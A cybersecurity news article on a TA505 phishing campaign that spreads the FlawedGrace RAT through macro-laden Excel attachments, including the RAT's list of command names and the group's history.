TA505 Hackers Group Spreading FlawedGrace RAT Via Mass Email Campaigns

A massive malicious email campaign from the TA505 group has been recently discovered targeting users in Germany and Austria through which the threat actors are spreading FlawedGrace RAT through emails.

This current campaign has been linked with the TA505 hacking group, whose members have used the Dridex banking Trojan and tools in their past attacks, and here are the tools we have mentioned below:-

  • FlawedAmmyy
  • FlawedGrace
  • Neutrino botnet
  • Locky ransomware

Evolving Campaigns

With a range of small waves of e-mails delivering only a few thousand messages at each stage the attacks began, and while the number of letters spiked in late September to hundreds of thousands.

The whole scenario got changed in late September and in early October 2021; as in this time frame the hacking group, TA505 began sending higher email volumes to more industries, which accounts for tens to hundreds of thousands.

Commonalities to Historic TA505 Activity

If we will compare the current campaign with the earlier campaigns of TA505, then you will see lots of similarities between them. And the similarities are:-

  • Emails
  • Landing pages
  • Excel graphic lures
  • Domain naming conventions
  • Code reuse

Here the threat actors after opening malicious Microsoft Excel attachments trick the users into activating macros and then install the next stage downloaders by downloading an obfuscated MSI file.

Once done the above procedures, after that, they install an updated version of the FlawedGrace remote access Trojan. While here in this stage, the loader scaffolds are coded in uncommon languages, and here they are:-

  • Rebol
  • KiXtart

Commands followed by FlawedGrace RAT

FlawedGrace is first discovered in November 2017, and it is a full-featured RAT that is written in C++, which is specifically designed to prevent reverse engineering and analysis. 

The Trojan can receive and follow the following commands through a custom binary protocol on TCP port 443 from its C&C:-

  • target_remove
  • target_update
  • target_reboot
  • target_module_load
  • target_module_load_external
  • target_module_unload
  • target_download
  • target_upload
  • target_rdp
  • target_passwords
  • target_servers
  • target_script
  • destroy_os
  • desktop_stat

Apart from this, the TA505 is a financially motivated hacking group that is well-renowned for conducting malicious email campaigns on an unprecedented scale.

Not only that even this group also changes their TTPs frequently and that’s why this group is considered as one of the leaders in the cybercrime world.

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.